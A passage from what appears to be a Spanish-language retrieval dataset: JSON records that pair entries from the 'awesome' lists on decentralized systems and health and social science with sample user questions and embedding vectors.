-0.12084, -0.02269, 0.06337, 0.02338, -0.07694, 0.07575, -0.0006, -0.00246, 0.10256, 0.0268, -0.13514, 0.04264, 0.0604, 0.16851, -0.08243, -0.01786, 0.11186, 0.00978, 0.0243, 0.09516, -0.07224, 0.03923, -0.07747, -0.04385, 0.02823, -0.12776, 0.03884, -0.04891, 0.00469, 0.00416, 0.0477, 0.02343, -0.00965, 0.003, 0.08001, -0.01241, -0.01861, -0.00476, 0.07803, 0.06011, -0.12427, 0.04325, 0.03683, 0.06741, 0.07871, 0.00337, 0.18457, -0.02112, -0.08699, -0.02438, 0.02893, -0.05831, 0.02195, -0.05466, -0.01081, -0.08177, -0.01236, 0.00664, 0.0068, 0.01334, -0.03453, -0.05298, 0.06421, -0.01326, -0.0264, -0.00896, 0.0656, 0.01509, 0.12504, 0.01842, -0.02517, -0.03249, -0.04215, 0.05932, -0.06989, -0.05082, -0.03103, 0.03097, 0.04737, 0.05274, -0.04825, -0.04396, 0.0711, 0.03849, -0.00854, -0.01428, -0.05749, -0.02332, 0.02394, 0.03189, -0.03021, 0.00171, -0.02907, 0.0954, 0.01332, -0.04868, 0.04071, 0.02812, -0.03614, -0.01737, 0.01319, -0.03274, -0.00561, 0.03894, -0.04843, -0.00979, 0.13928, -0.07016, -0.08654, 0.0068, -0.02121, -0.04717, -0.03654, -0.05133, -0.00892, -0.02217, -0.00787, -0.10045, 0.03208, 0.02024, -0.04635, -0.04205, -0.01511, 0.01088, -0.01094, -0.00884, 0.03359, 0.01622, 0.03168, -0.00329, 0.07255, 0.08396, 0.11465, -0.01074, -0.01799, -0.00506, -0.0045, -0.0099, -0.09487, 0.00848, -0.02179, -0.01461, -0.02102, 0.03024, -0.04004, 0.07398, -0.0223, 0.01415, -0.02196, -0.00764, 0.07112, -0.06713, -0.10438, 0.02402, 0.04607, 0.04585, -0.02745, 0.00813, 0.0985, 0.02193, 0.04818, 0.037, -0.00503, 0.04651, -0.0449, 0.0222, -0.0038, -0.04239, -0.00758, 0.01101, -0.03726, -0.0076, 0.01867, 0.00564, 0.05872, -0.01204, -0.0635, 0.01041, 0.02495, 0.07449, -0.04395, -0.01722, -0.01337, -0.02514, -0.10574, 0.01832, -0.00941, -0.09635, 0.00162, 0.08572, 0.04891, -0.03012, 0.00867, -0.00506]} -{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Bitcoin β€” Services and tools for Bitcoin software developers. Ripple β€” Open source distributed settlement network. Non-Financial Blockchain β€” Applications of Blockchain beyond finance. Mastodon β€” Open source decentralized microblogging network. Ethereum β€” Distributed computing platform for smart contract development. Blockchain AI β€” AI and machine-learning projects built on Blockchain. EOSIO β€” A decentralized operating system supporting industrial-scale apps. Corda β€” Open source Blockchain platform designed for business. Waves β€” Open source Blockchain platform and development toolset for Web 3.0 apps and decentralized solutions. Substrate β€” Framework for writing scalable, upgradeable blockchains in Rust. Golem β€” Open source peer-to-peer marketplace for computing resources. Stacks β€” A smart contract platform secured by Bitcoin. Algorand β€” An open-source, proof of stake Blockchain and smart contract computing platform. ZeroNet β€” A decentralized web-like network of peer-to-peer users.", "indexar": "quΓ© programa o herramienta sirve para crear aplicaciones descentralizadas?", "v": [-0.10087, 0.09538, -0.12139, -0.21624, 0.09143, -0.18054, -0.05136, -0.05164, -0.05777, -0.04863, -0.07869, -0.10655, -0.07278, -0.10562, 0.04969, 0.04182, 0.05053, -0.15115, 0.03046, 0.03435, -0.01906, 0.04099, -0.08808, -0.07317, -0.13436, 0.00986, 0.0387, -0.09799, -0.14299, 0.04233, 0.02797, 0.01536, 0.0722, -0.06929, -0.07813, -0.10093, -0.00791, -0.02891, -0.11021, 0.04876, -0.01047, 0.04787, -0.0779, 0.06035, 0.0448, 0.05297, 0.06978, 0.00601, -0.03428, 0.01947, -0.07206, -0.10887, -0.09092, 0.02016, 0.0785, -0.14787, 0.04148, -0.16315, 0.00341, -0.04926, -0.1076, 0.04843, -0.00297, -0.06912, 0.02215, -0.05945, 0.05129, -0.0006, -0.07214, 0.07437, -0.02688, 0.0404, 0.08809, -0.01951, 0.05323, 0.01919, -0.06103, -0.01836, 0.01384, -0.08159, 0.01661, 0.02536, -0.03757, 0.0241, -0.04345, -0.04776, 0.11019, 0.02641, 0.00765, -0.05697, -0.03097, 0.08155, -0.03067, 0.06665, 0.06858, -0.05371, 0.14761, -0.0449, 0.07994, 0.12899, 0.10598, -0.13997, -0.07337, 0.02731, -0.07883, 0.00475, 0.06862, -0.0775, -0.05942, 0.01801, 0.00987, -0.00848, 0.04771, 0.0207, -0.0378, 0.06598, -0.02328, -0.04819, 0.02829, -0.06327, -0.02947, 0.04434, -0.04906, -0.03792, 0.04312, 0.02234, 0.00118, 0.1193, -0.01348, 0.07068, 0.01479, -0.0608, -0.11274, 0.01459, -0.07536, -0.08663, 0.06609, -0.07253, 0.0174, -0.03653, 0.04664, 0.06809, -0.00728, -0.05119, 0.03124, 0.00917, 0.06881, -0.03113, 0.02011, 0.05769, 0.0446, -0.06376, -0.02587, 0.02136, -0.10487, -0.02359, -0.04098, -0.05749, -0.08051, 0.06726, -0.08678, -0.01838, -0.04493, -0.04531, 0.02325, -0.10695, 0.04214, 0.03291, 0.13507, 0.13097, -0.00538, 0.07138, 0.10243, -0.08127, 0.03443, -0.05887, -0.00887, -0.04165, 0.01806, -0.09403, -0.1057, 0.00902, 0.0211, 0.00159, 0.02916, -0.05474, -0.03852, 0.00111, 0.04219, 0.03697, -0.07337, 0.03382, -0.01358, -0.03291, 0.04243, -0.01551, -0.00264, -0.06191, 0.01681, -0.03328, -0.069, -0.01591, -0.01113, -0.01961, 0.00859, 0.12216, -0.03518, 0.02099, 0.00539, 0.11448, 0.00952, -0.00544, 0.04545, 0.03839, 0.00943, -0.07197, 0.00406, 0.05658, 0.00917, 0.01891, 0.01136, -0.04703, 0.00908, 0.02629, -0.01303, -0.01254, 0.03086, 0.02882, 0.02255, 0.00459, 0.01131, -0.0624, 0.00413, -0.03198, 0.01635, -0.0287, 0.02533, -0.00574, -0.01201, -0.07584, -0.04631, 0.09571, -0.00847, -0.03386, -0.04413, -0.01353, -0.00821, -0.01345, -0.03462, -0.04252, -0.0525, 0.02529, 0.0875, -0.03363, 0.05126, -0.00056]} -{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Bitcoin β€” Services and tools for Bitcoin software developers. Ripple β€” Open source distributed settlement network. Non-Financial Blockchain β€” Applications of Blockchain beyond finance. Mastodon β€” Open source decentralized microblogging network. Ethereum β€” Distributed computing platform for smart contract development. Blockchain AI β€” AI and machine-learning projects built on Blockchain. EOSIO β€” A decentralized operating system supporting industrial-scale apps. Corda β€” Open source Blockchain platform designed for business. Waves β€” Open source Blockchain platform and development toolset for Web 3.0 apps and decentralized solutions. Substrate β€” Framework for writing scalable, upgradeable blockchains in Rust. Golem β€” Open source peer-to-peer marketplace for computing resources. Stacks β€” A smart contract platform secured by Bitcoin. Algorand β€” An open-source, proof of stake Blockchain and smart contract computing platform. ZeroNet β€” A decentralized web-like network of peer-to-peer users.", "indexar": "con quΓ© puedo desarrollar contratos inteligentes en una plataforma de computaciΓ³n distribuida?", "v": [0.11938, 0.03913, -0.1405, -0.18966, 0.10497, -0.15051, 0.07867, -0.00179, -0.2024, -0.12048, -0.10118, -0.12354, -0.06858, -0.09249, -0.06873, 0.0222, 0.11343, -0.11083, 0.03042, -0.12749, 0.04698, -0.07775, -0.08602, -0.09232, -0.01286, -0.07005, -0.00984, 0.10054, -0.07856, 0.02522, -0.06456, -0.08891, 0.00277, -0.02799, -0.02907, 0.02118, -0.07465, 0.14388, 0.07605, -0.09916, -0.02716, 0.02873, 0.0027, -0.11561, 0.15171, 0.02917, -0.05156, -0.1399, 0.03945, 0.00316, -0.11797, 0.0008, -0.10292, -0.05808, 0.02663, -0.02642, 0.11188, -0.00452, 0.09756, -0.01945, -0.09323, 0.03634, -0.02274, -0.03057, 0.02995, 0.03957, -0.02988, 0.13237, -0.11245, 0.09483, 0.0594, 0.0416, -0.03634, -0.05326, 0.05345, 0.1287, -0.0621, -0.07949, 0.08071, 0.04262, -0.00126, -0.02458, -0.07919, -0.01722, 0.07355, -0.11362, 0.03547, -0.00634, -0.05129, -0.03227, -0.01145, -0.06611, -0.02705, -0.01325, 0.04349, -0.00551, 0.1085, -0.01704, -0.08242, -0.03381, -0.06421, 0.02863, -0.09901, 0.05812, -0.11262, 0.16398, 0.01509, -0.02188, 0.02153, -0.10128, 0.02822, 0.01354, -0.01259, 0.02463, -0.05773, 0.02264, 0.07878, 0.00206, 0.0349, 0.036, 0.03238, 0.03432, 0.04315, 0.00754, 0.08296, 0.02188, -0.04708, 0.13011, -0.0271, -0.00653, -0.01335, -0.11674, -0.06326, -0.01281, 0.03102, 0.01338, 0.06641, 0.00455, 0.01537, -0.01618, 0.00574, 0.01539, -0.03656, -0.03086, 0.0191, -0.02437, -0.00129, -0.05256, -0.01853, -0.00866, -0.04598, 0.02808, -0.05346, 0.10714, -0.07968, -0.0657, 0.06207, -0.01309, -0.13848, 0.04824, -0.02113, 0.02062, -0.02673, 0.06291, 0.04148, 0.01973, -0.01575, 0.04981, -0.00364, 0.09378, 0.00017, 0.08564, 0.04275, -0.09782, 0.02256, -0.04484, -0.03482, 0.03142, -0.04421, -0.04897, -0.04283, -0.01712, -0.03264, 0.00523, -0.01094, -0.00658, -0.02514, -0.0049, 0.0257, 0.02553, -5e-05, 0.04272, -0.03138, 0.04495, 0.05908, -0.01965, -0.11543, -0.00102, 0.00932, -0.04366, -0.01771, 0.07047, 0.04163, 0.02135, -0.00686, 0.00808, -0.00037, -0.0027, 0.01021, -0.00028, -0.02406, -0.02347, 0.1051, -0.02594, -0.06689, 0.01417, 0.03607, -0.04091, 0.03126, -0.03004, 0.02582, -0.05544, -0.00332, -0.0246, 0.01321, 0.0255, 0.05826, 0.05462, -0.002, -0.00946, 0.04556, -0.00675, 0.013, -0.01132, -0.02881, -0.00126, -0.04346, 0.01492, -0.09342, 0.01007, -0.03958, 0.02178, 0.01808, -0.0618, 0.0067, -0.03089, -0.08605, -0.04894, -0.02876, -0.05039, -0.09511, 0.01395, 0.07451, -0.06734, -0.0014, 0.0105]} -{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Bitcoin β€” Services and tools for Bitcoin software developers. Ripple β€” Open source distributed settlement network. Non-Financial Blockchain β€” Applications of Blockchain beyond finance. Mastodon β€” Open source decentralized microblogging network. Ethereum β€” Distributed computing platform for smart contract development. Blockchain AI β€” AI and machine-learning projects built on Blockchain. EOSIO β€” A decentralized operating system supporting industrial-scale apps. Corda β€” Open source Blockchain platform designed for business. Waves β€” Open source Blockchain platform and development toolset for Web 3.0 apps and decentralized solutions. Substrate β€” Framework for writing scalable, upgradeable blockchains in Rust. Golem β€” Open source peer-to-peer marketplace for computing resources. Stacks β€” A smart contract platform secured by Bitcoin. Algorand β€” An open-source, proof of stake Blockchain and smart contract computing platform. ZeroNet β€” A decentralized web-like network of peer-to-peer users.", "indexar": "cual es una alternativa libre a los servicios de redes blockchain como Bitcoin o Ethereum?", "v": [-0.09213, -0.05544, -0.04927, -0.02369, 0.0268, -0.05318, -0.10463, 0.0027, -0.04942, -0.12925, -0.16846, -0.09152, -0.04587, 0.06719, 0.11778, -0.03328, -0.07185, -0.11528, 0.09186, -0.11115, 0.00513, -0.00109, -0.06699, -0.02358, 0.08886, -0.04756, -0.14467, 0.14846, -0.07241, 0.1826, 0.04913, -0.13873, 0.04296, 0.02564, 0.02086, 0.01332, 0.0581, 0.07765, 0.04912, -0.04803, 0.00272, -0.0862, 0.07013, -0.00367, -0.05044, -0.03743, -0.02246, -0.01953, 0.07996, -0.11563, -0.13327, -0.01168, -0.22301, 0.10976, 0.0242, 0.02821, 0.09806, -0.08654, -0.02388, 0.0624, -0.05983, 0.00553, 0.06485, -0.00762, -0.07343, 0.02096, -0.11257, 0.16457, -0.09777, 0.14067, 0.10461, 0.02337, -0.01801, -0.00549, -0.02249, 0.07357, -0.07819, -0.04645, -0.03602, 0.04915, -0.06097, -0.02498, 0.01871, 0.15088, -0.07685, 0.03493, 0.07212, -0.07267, -0.00311, 0.05419, -0.0187, 0.09364, 0.01033, -0.06226, 0.03559, 0.03735, -0.01709, 0.00501, 0.01628, -0.05082, -0.05415, 0.01792, -0.04769, 0.05385, 0.01589, 0.02668, 0.05446, -0.04232, -0.00386, -0.12984, -0.00489, 0.00847, -0.0659, 0.07114, -0.09168, -0.07582, -0.05748, 0.04313, 0.07158, 0.01826, -0.00291, -0.03961, -0.04012, -0.02344, 0.08794, 0.05534, -0.07414, 0.07017, 0.05363, -0.04157, 0.0061, 0.08105, -0.13152, -0.01194, -0.05678, 0.03135, 0.05288, -0.00976, 0.03348, -0.00521, 0.06672, -0.00953, 0.02434, -0.06139, 0.10065, -0.05235, 0.07772, -0.05608, -0.03004, -0.03488, 0.01679, 0.01794, -0.08364, 0.07471, -0.12274, -0.06784, -0.12144, -0.12099, -0.08889, 0.06869, 0.05183, -0.03178, 0.03037, -4e-05, -0.11311, 0.05508, 0.0261, 0.07152, -0.04154, 0.02992, -0.03595, 0.09573, -0.03176, -0.09249, 0.04554, -0.09391, -0.00072, 0.00493, 0.06971, -0.05393, -0.04668, -0.02906, -0.042, 0.00143, -0.00273, -0.03591, 0.06757, 0.04689, -0.02521, 0.05147, -0.03412, -0.0122, -0.06527, 0.01762, 0.01356, -0.04997, -0.01789, -0.02293, -0.02725, 0.0209, 0.01553, 0.02505, -0.01122, -0.01017, -0.05597, 0.06847, -0.06525, -0.02346, -0.04113, 0.0146, 0.02536, -0.03869, 0.0731, 0.02503, 0.01312, -0.0249, 0.03717, -0.03057, -0.00924, 0.01182, -0.02261, 0.03437, 0.00306, -0.0039, 0.01046, 0.04708, 0.03609, 0.02164, 0.00817, 0.0134, 0.03557, 0.00744, -0.03189, 0.0043, 0.01558, 0.05105, 0.03205, 0.02676, -0.07028, -0.01423, -0.00281, 0.03049, -0.03382, 0.00917, 0.00853, -0.00439, -0.05794, -0.00148, -0.05926, -0.05914, -0.02637, 0.02295, 0.10079, 0.01368, -0.02463, -0.00528]} -{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Cosmos SDK β€” Modular framework for building app-specific blockchains in Go. Tor β€” A free overlay network for enabling anonymous communication. ATProto β€” Open, decentralized network for building social apps.", "indexar": "que framework sirve para construir cadenas de bloques especΓ­ficas con Go?", "v": [0.10917, -0.05606, -0.15442, -0.09877, 0.00608, -0.0874, 0.03546, 0.03382, -0.0287, -0.13343, -0.03321, 0.06777, -0.19549, -0.05848, 0.12063, 0.06799, 0.01686, -0.12236, -0.04725, 0.01721, -0.0582, -0.08864, 0.05607, -0.07865, -0.00938, -0.05852, 0.02963, -0.06946, -0.18702, 0.00856, 0.01085, -0.01586, 0.00766, -0.01166, -0.12364, -0.06759, -0.0213, 0.07868, -0.14082, -0.05349, -0.08653, -0.01205, -0.13116, -0.00729, -0.07279, -0.00853, 0.10088, 0.00519, -0.07857, -0.00359, -0.13937, -0.01922, -0.10989, -0.03224, 0.00832, -0.01516, 0.1744, -0.07446, -0.04849, 0.10845, -0.11556, -0.10422, 0.11135, -0.07774, 0.0324, -0.00758, -0.10809, 0.06545, -0.04422, -0.11485, -0.04775, -0.06913, -0.0553, 0.04306, 0.0102, 0.12132, 0.01228, -0.03696, 0.0078, 0.1057, 0.04385, -0.05683, -0.06362, 0.0141, 0.08858, 0.14534, -0.06602, -0.00149, -0.02838, -0.05956, 0.06439, 0.071, -0.04271, -0.01945, 0.02171, -0.01594, 0.02262, 0.08757, 0.0859, -0.0165, -0.00423, -0.01829, -0.05936, 0.06757, 0.0644, 0.10198, 0.01333, -0.01361, 0.04591, -0.11947, -0.01026, 0.06407, -0.05591, -0.06916, -0.02834, 0.00516, -0.05111, -0.01549, -0.00698, 0.0419, -0.00582, 0.068, -0.06062, -0.03984, 0.03295, 0.01782, -0.04606, 0.06989, 5e-05, -0.01552, -0.0878, 0.04786, -0.06511, 0.01123, -0.13803, 0.00219, 0.12187, -0.05292, -0.01659, -0.13514, 0.10086, 0.00275, 0.01522, 0.04847, 0.00074, -0.04001, -0.02225, -0.11989, -0.0026, 0.02934, 0.0185, 0.04988, 0.01592, -0.00355, -0.09487, -0.06633, -0.02978, -0.09733, -0.02321, 0.11966, 0.06529, -0.01447, 0.01035, 0.07959, -0.03225, -0.00745, -0.1332, 0.04419, 0.07327, 0.05508, -0.01813, -0.03528, 0.04668, -0.04876, -0.00905, -0.01175, -0.03721, -0.01613, -0.07604, -0.05688, -0.06397, -0.05513, -0.01366, 0.02167, -0.00356, -0.05783, -0.06601, -0.03223, 0.0769, 0.04049, -0.00424, 0.0213, -0.03503, -0.01653, -0.01887, -0.02955, -0.01855, -0.04208, 0.01337, -0.01444, -0.02824, 0.03613, 0.01925, -0.04579, 0.00432, 0.06739, -0.07309, 0.03539, 0.05751, 0.09108, 0.10531, -0.0633, 0.01589, -0.06352, -0.00042, -0.00924, 0.03293, 0.03623, -0.01744, 0.01162, -0.03542, 0.07378, -0.00483, 0.01619, 0.01702, 0.01282, 0.00691, 0.01748, 0.01094, 0.01497, 0.01326, -0.01864, -0.07171, 0.03171, -0.01695, -0.00365, -0.05908, 0.01807, -0.05276, 0.01171, -0.02559, 0.0432, -0.08148, 0.01743, 0.03326, 0.0242, -0.02885, 0.04538, 0.01433, -0.0966, -0.04216, 0.0274, -0.00972, -0.0366, -0.02176, -0.0251]} -{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Cosmos SDK β€” Modular framework for building app-specific blockchains in Go. Tor β€” A free overlay network for enabling anonymous communication. ATProto β€” Open, decentralized network for building social apps.", "indexar": "con que puedo montar una red social descentralizada y abierta?", "v": [-0.07642, 0.04792, -0.19182, -0.05401, -0.14203, -0.04194, -0.08562, 0.00021, -0.08689, -0.11481, -0.11705, -0.14698, 0.02759, -0.05408, 0.11848, 0.06705, -0.02592, 0.04977, 0.03858, -0.07374, -0.02924, -0.08101, -0.02219, -0.09234, 0.08935, 0.00711, 0.03091, -0.14161, -0.04585, 0.02463, 0.06634, 0.0172, 0.02116, 0.09796, 0.005, -0.02381, 0.04896, -0.01888, -0.04377, -0.12258, -0.08799, 0.01722, -0.07263, -0.01459, 0.01908, 0.07316, 0.00345, -0.09263, -0.12253, 0.06479, -0.07719, -0.1199, -0.17017, -0.07315, -0.11895, -0.03458, -0.01297, 0.02824, -0.06669, 0.01901, -0.00088, 0.13946, -0.02785, 0.0856, 0.03562, -0.05816, -0.03796, 0.11358, -0.05263, 0.06161, 0.00645, -0.02394, -0.08195, 0.05411, 0.02724, 0.07908, -0.12623, -0.00654, 0.01373, 0.06373, -0.02992, 0.07869, 0.02601, 0.07273, 0.0374, -0.02802, 0.04793, -0.14892, 0.00474, -0.03628, 0.02102, 0.00552, -0.0191, -0.01334, -0.02452, -0.05952, -0.05454, 0.04239, -0.05432, -0.0408, -0.07641, -0.03033, -0.01384, 0.00127, 0.05843, -0.09974, 0.05051, -0.09706, 0.14484, -0.02278, 0.05043, -0.01046, -0.03283, 0.02689, -0.01598, -0.03688, -0.12675, 0.13226, 0.01056, -0.03891, 0.00976, 0.02304, -0.0007, -0.07862, 0.02499, 0.00138, 0.03449, 0.06813, 0.02938, 0.07337, -0.08334, 0.06266, -0.0648, -0.09953, -0.01971, -0.03601, -0.05149, -0.07709, 0.02389, -0.01886, 0.01214, -0.0067, -0.02422, -0.18309, 0.01268, 0.0553, 0.00737, -0.14215, -0.04013, 0.06467, -0.01499, 0.11032, 0.0355, 0.01887, -0.04654, 0.03244, 0.02503, -0.01722, 0.08327, 0.10966, -0.02237, 0.04902, -0.0449, -0.05146, -0.02106, -0.00413, -0.01577, -0.01158, 0.08428, -0.06221, -0.02286, 0.05831, 0.02111, 0.04181, 0.10608, -0.06418, -0.06289, -0.11364, 0.02986, -0.05865, -0.03366, 0.03502, -0.03393, -0.00859, -0.00515, -0.01778, -0.07783, -0.03278, 0.02029, -0.01839, -0.04022, -0.11497, 0.02366, 0.07748, 0.09544, -0.05085, 0.02284, 0.05285, 0.01739, -0.04144, -0.04017, 0.02897, -0.02931, 0.03073, -0.07891, 0.02163, -0.01798, 0.11169, -0.03694, 0.09853, 0.00052, -0.04433, 0.07092, -0.03017, -0.04889, -0.01775, 0.02247, -0.02643, -0.00831, 0.00519, 0.04113, 0.06763, 0.10042, 0.06488, 0.04737, 0.0349, 0.01024, 0.00624, 0.03879, 0.01907, -0.01355, 0.01538, 0.00284, 0.01149, 0.03417, -0.01545, 0.06778, 0.04604, -0.01381, 0.0066, 0.03704, 0.104, 0.01281, -0.00744, 0.01816, -0.03643, -0.0822, 0.03818, 0.00466, -0.07535, -0.04468, 0.03192, 0.00773, -0.07497, -0.00825, 0.01405]} -{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Cosmos SDK β€” Modular framework for building app-specific blockchains in Go. Tor β€” A free overlay network for enabling anonymous communication. ATProto β€” Open, decentralized network for building social apps.", "indexar": "cual es una alternativa libre a Tor para comunicarme de forma anΓ³nima?", "v": [0.01735, 0.12151, -0.03965, 0.01844, -0.03614, -0.04563, 0.00721, 0.03248, -0.14834, -0.0269, -0.10001, -0.18714, 0.12434, 0.10239, 0.07997, 0.01653, 0.1628, -0.09657, 0.17273, 0.06007, 0.00074, -0.00036, -0.09202, -0.0684, 0.0362, -0.18468, -0.03315, -0.10836, 0.10402, 0.0003, 0.00674, -0.0759, 0.14964, 0.05238, -0.00571, 0.02699, 0.07316, 0.0421, 0.07685, -0.03813, 0.00107, -0.07213, -0.01742, 0.17, -0.02998, -0.00199, -0.0828, 0.02276, 0.13956, 0.13009, -0.13961, -0.02747, -0.09728, -0.00042, -0.00248, 0.06672, 0.16476, -0.117, -0.03958, -0.04228, 0.05407, 0.02237, -0.00711, -0.03523, 0.14687, -0.00253, -0.03416, -0.06268, -0.11521, 0.08331, 0.07989, -0.02635, -0.03096, 0.04111, 0.02589, 0.02973, -0.16869, 0.0149, 0.03315, 0.0526, 0.07267, -0.07005, -0.06595, 0.08865, 0.00295, -0.02401, -0.00661, -0.12417, -0.04947, -0.0096, 0.06324, 0.04831, -0.06039, 0.01592, 0.06151, -0.10345, -0.01691, 0.03092, -0.07247, 0.05304, 0.02284, 0.11894, -0.11932, 0.01836, -0.0004, -0.00763, -0.09683, -0.03519, 0.03453, 0.0347, -0.01935, 0.00694, -0.0366, 0.00552, 0.02953, -0.04542, -0.07378, -0.01558, 0.04629, 0.02197, -0.01067, -0.0268, 0.00026, -0.04695, 0.03201, -0.00254, -0.01869, 0.02924, -0.0166, 0.11354, 0.05074, 0.02056, -0.0379, -0.10342, -0.08524, 0.03017, 0.06861, -0.00288, 0.05319, -0.05195, -0.00414, -0.00976, -0.00885, -0.07566, 0.0396, -0.0256, -0.02477, -0.01925, -0.00485, -0.01604, -0.09305, -0.02309, -0.03124, 0.11063, -0.01357, 0.04039, -0.07114, -0.04642, -0.04155, 0.02518, -0.01684, 0.00685, 0.0128, -0.00726, 0.04141, -0.1282, 0.00436, -0.01586, -0.01521, -0.00099, 0.02367, 0.02203, 0.0903, -0.07149, 0.04555, -0.03732, -0.09069, -0.05895, -0.07528, -0.10265, 0.03163, 0.02166, -0.10959, -0.01714, 0.00039, -0.00866, 0.0044, 0.00332, -0.00756, -0.03952, 0.01047, 0.01435, -0.07382, -0.08951, -0.04488, 0.00189, 0.01494, -0.06962, 0.05728, -0.01809, -0.06479, 0.00128, -0.0157, 0.0081, 0.0037, 0.01108, 0.00126, -0.0386, 0.00063, 0.07173, 0.0766, -0.01414, 0.09813, 0.01534, -0.02218, 0.04916, 0.03505, -0.04926, 0.00085, 0.04038, 0.01044, 0.05347, 0.04158, -0.04344, 0.00947, 0.04954, 0.04508, 0.0333, -0.05397, 0.00775, -0.04949, 0.02135, 0.05248, 0.00279, 0.04565, -0.00411, -0.00223, -0.00037, -0.04591, -0.0172, 0.07086, 0.07873, -0.02009, 0.04341, -0.04219, -0.03916, -0.10088, 0.01532, -0.06522, -0.07915, -0.03865, 0.06281, 0.03932, -0.00209, 0.03216, 0.02441]} -{"tipo": "pregunta", "herramienta": "Health and Social Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Health and Social Science", "tema": "health and social science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Health and Social Science: Biomedical Information Extraction β€” How to extract information from unstructured biomedical data and text. Computational Neuroscience β€” A multidisciplinary science which uses computational approaches to study the nervous system. Diversity β€” Creating a more inclusive and diverse tech community. Digital History β€” Computer-aided scientific investigation of history. Empathy in Engineering β€” Building and promoting more compassionate engineering cultures. Healthcare β€” Open source healthcare software for facilities, providers, developers, policy experts, and researchers. Mental Health β€” Awareness and self-care in the software industry. Neuroscience β€” Study of the nervous system and brain. Digital Humanities β€” Software for humanities scholars using quantitative or computational methods. Lucid Dreams β€” A dream where one becomes aware they are dreaming. Neuroimaging β€” Software for analyzing brain data from living subjects. Transgender β€” Someone whose gender identity differs from their assigned birth sex.", "indexar": "que programa puedo usar para extraer informaciΓ³n de textos biomΓ©dicos no estructurados?", "v": [-0.08708, -0.0595, -0.11542, -0.05267, 0.13627, -0.05302, -0.04507, -0.0751, -0.11467, -0.14495, -0.13369, -0.0016, -0.02346, -0.03418, 0.01772, -0.11051, 0.19798, -0.09748, -0.0464, -0.04647, 0.04736, -0.05508, -0.10624, 0.1756, -0.00379, -0.00252, -0.09489, -0.06108, -0.00783, 0.10771, -0.0507, 0.0907, 0.16084, -0.11322, -0.05805, 0.05642, 0.03734, -0.0146, -0.07777, 0.08105, 0.00504, -0.01531, 0.04726, -0.01465, 0.01612, -0.01622, 0.01455, 0.00212, -0.07135, -0.08147, 0.01247, -0.01109, -0.14971, -0.02514, -0.08804, -0.1036, 0.15341, -0.18289, -0.06494, 0.05614, 0.19242, 0.04228, 0.06289, -0.04213, 0.01246, -0.10674, 0.03245, -0.00787, -0.07383, 0.11012, -0.00068, 0.02006, 0.10155, 0.03413, -0.03868, 0.04166, -0.08529, -0.01335, 0.06372, 0.06511, -0.03716, -0.00378, -0.09354, 0.0867, -0.01674, -0.03222, 0.03849, -0.02111, -0.07443, -0.07417, 0.08068, -0.04456, 0.01529, 0.014, 0.0238, -0.09034, 0.00904, 0.05774, 0.02954, 0.14171, 0.03219, -0.07921, -0.02136, 0.09314, -0.00064, 0.02974, 0.00688, -0.00613, -0.04957, -0.01021, -0.04084, -0.06414, -0.07412, -0.04781, -0.12067, -0.0067, 0.00173, 0.09141, 0.00185, -0.08691, -0.02599, 0.04344, -0.00361, -0.03714, 0.05948, -0.01034, -0.0075, 0.10835, 0.00792, 0.02907, 0.01289, 0.01924, -0.03561, -0.0582, -0.04934, -0.12606, 0.02792, 0.00822, -0.0262, -0.03719, 0.00092, 0.01572, -0.08333, 0.08986, -0.06672, -0.02173, -0.04998, -0.04386, 0.00968, -0.03924, 0.00848, 0.04008, 0.05701, 0.06763, -0.09716, 0.01264, 0.02471, -0.02009, -0.0779, 0.00484, -0.10828, 0.00327, -0.0261, 0.01651, 0.04188, 0.00174, -0.09657, -0.07539, -0.00121, 0.03149, 0.01963, 0.03886, 0.08374, -0.07655, 0.00105, 0.02677, -0.01298, 0.02473, -0.03597, -0.01121, -0.08009, -0.01295, -0.027, -0.03865, 0.01137, -0.0446, -0.03831, 0.04297, -0.05709, 0.04697, -0.00482, 0.09451, 0.04727, 0.01105, -0.04718, -0.00777, -0.04755, 0.00418, 0.07174, -0.05737, -0.01516, 0.06373, 0.01, 0.028, 0.03547, 0.07933, -0.04298, -0.01596, -0.00126, 0.13508, 0.06077, -0.02611, 0.01881, 0.0237, -0.06291, 0.00988, 0.0158, 0.02249, 0.03266, 0.02445, -0.01474, 0.03664, 0.10674, 0.07639, 0.03076, -0.09073, 0.02512, 0.00995, 0.01803, 0.03125, -0.0198, -0.03269, 0.03526, 0.05837, 0.03608, -0.0384, 0.00763, 0.00582, -0.05038, -0.06791, -0.00784, 0.05231, 0.00338, -0.0795, 0.01299, 0.0199, -0.0693, 0.01113, 0.00181, -0.03663, -0.00468, 0.00395, 0.03369, -0.03787, 0.08426, 0.0968]} -{"tipo": "pregunta", "herramienta": "Health and Social Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Health and Social Science", "tema": "health and social 